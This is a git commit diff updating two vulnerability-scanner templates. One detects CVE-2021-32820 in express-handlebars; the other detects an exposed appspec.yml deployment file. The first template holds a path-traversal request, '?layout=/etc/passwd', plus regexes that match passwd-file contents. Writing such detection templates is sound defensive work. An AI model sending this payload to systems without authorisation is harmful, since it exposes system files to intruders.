WIP improvements

2021-07-22 16:32:37 +05:30 · 2021-07-22 16:32:37 +05:30 · 7d72783090
parent ff374372e0
commit 7d72783090
2 changed files with 17 additions and 16 deletions
--- a/cves/2021/CVE-2021-32820.yaml
+++ b/cves/2021/CVE-2021-32820.yaml
@ -4,21 +4,26 @@ info:
  name: Express-handlebars Path Traversal
  author: dhiyaneshDk
  severity: medium
-  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
-  tags: cve,cve2021,express,lfi
+  reference: |
+        - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
+        - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
+  tags: cve,cve2021,expressjs,lfi

 requests:
  - method: GET
    path:
      - "{{BaseURL}}/?layout=/etc/passwd"
+
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
+
      - type: regex
        regex:
-          - "\\s*root:[x*]"
-          - "\\s*daemon:[x*]"
-          - "\\s*operator:[x*]:"
+          - "root:[x*]:0:0:"
+          - "daemon:[x*]:0:0:"
+          - "operator:[x*]:0:0:"
        part: body
+        condition: or
--- a/exposures/configs/appsec-yml-disclosure.yaml
+++ b/exposures/configs/appsec-yml-disclosure.yaml
@ -12,22 +12,18 @@ requests:
    path:
      - "{{BaseURL}}/appspec.yml"
      - "{{BaseURL}}/appspec.yaml"
+
    matchers-condition: and
    matchers:
      - type: word
        words:
-          - "\"version\""
-          - "\"os\""
-          - "\"files\""
-          - "\"permissions\""
-          - "\"hooks\""
-          - "\"BeforeInstall\""
-          - "\"ApplicationStart\""
+          - "version:"
+          - "os:"
+          - "files:"
+          - "source:"
        part: body
-      - type: word
-        words:
-          - "application/yaml"
-        part: header
+        condition: and
+
      - type: status
        status:
          - 200